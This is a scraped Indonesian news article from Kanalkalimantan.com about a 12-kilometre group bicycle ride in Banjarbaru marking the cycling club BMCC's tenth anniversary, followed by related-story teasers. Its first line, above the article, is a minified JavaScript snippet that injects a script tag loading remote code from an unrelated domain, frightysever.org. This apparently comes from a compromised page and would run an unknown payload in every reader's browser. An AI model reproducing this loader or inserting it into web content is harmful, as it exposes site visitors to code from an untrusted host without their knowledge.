(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
KANALKALIMANTAN.COM, BANJARBARU – Dinas Kepemudaan dan Olahraga (Dispora) Provinsi Kalimantan Selatan (Kalsel) bersama Banjarbaru Martapura Cycling Community (BMCC) menggelar “Gowes Bareng 2025” di Banjarbaru, Minggu (20/7/2025) pagi.
Gowes Bareng 2025 ini sekaligus menjadi momentum perayaan 10 tahun berdirinya komunitas sepeda gunung BMCC.
Menempuh rute trel 12 kilometer, Gowes Bareng diikuti sekitar 500 pesepeda dari berbagai kalangan masyarakat, komunitas, dan pegiat olahraga sepeda gunung.
Baca juga: Pagelaran Seni Sastra Taman Budaya Kalsel Peringati Hari Puisi Indonesia
Pelepasan peserta dilakukan langsung oleh Plt Kadispora Kalsel, M Fitri Hernadi, didampingi oleh Kabid Pembudayaan Olahraga Budiono, Kasi Pengembangan Olahraga Rekreasi, Tradisional, dan Layanan Khusus Rijal Hamid, serta jajaran panitia pelaksana.
M Fitri Hernadi menyampaikan apresiasi kepada BMCC yang telah berkontribusi besar dalam memasyarakatkan olahraga, khususnya bersepeda di Kalimantan Selatan.
“Gowes ini adalah bagian dari agenda rutin yang terus kami dorong, agar budaya berolahraga tumbuh dan bertahan, tidak hanya saat pandemi, tapi menjadi gaya hidup masyarakat kita,” ucapnya.
Dia menambahkan bahwa kegiatan ini diharapkan mampu menjadi pemicu semangat bagi masyarakat yang belum terbiasa berolahraga.
Baca juga: KM Barcelona Terbakar di Laut Manado, 280 Penumpang Dievakuasi TNI AL
“Olahraga itu bagian dari upaya menjaga tubuh dan jiwa. Melalui acara seperti ini, kami ingin mengajak lebih banyak warga untuk aktif dan sehat,” katanya.
Perayaan 10 tahun BMCC pun menjadi sorotan tersendiri dalam acara ini, sebagai bukti konsistensi komunitas dalam mendukung pengembangan olahraga rekreasi di daerah.
Kegiatan gowes ini nantinya para peserta akan mendapatkan doorprize menarik dari panitia seperti, kulkas, TV, kompor gas dan lainnya. (Kanalkalimantan.com/mckalsel)
Reporter: mckalsel
Editor: kk
KANALKALIMANTAN.COM, BANJARBARU - Kementerian Pendidikan Dasar dan Menengah (Kemendikdasmen) tegaskan komitmen meningkatkan kualitas sumber daya… Read More
KANALKALIMANTAN.COM, KUALA KAPUAS - Musyawarah Perencanaan Pembangunan (Musrenbang) Tingkat Kecamatan Selat dalam rangka penyusunan Rencana… Read More
KANALKALIMANTAN.COM, BANJARBARU - Presiden Republik Indonesia Prabowo Subianto didampingi sejumlah Menteri Kabinet Merah Putih dan… Read More
KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto berkeinginan membuka banyak sekolah dan kampus. Ia memandang pendidikan… Read More
KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto melakukan kunjungan kerja ke Kota Banjarbaru, Provinsi Kalimantan Selatan,… Read More
KANALKALIMANTAN.COM, BANJARBARU – Kota Banjarbaru menjadi salah satu titik penting peluncuran budaya sekolah aman dan… Read More
This website uses cookies.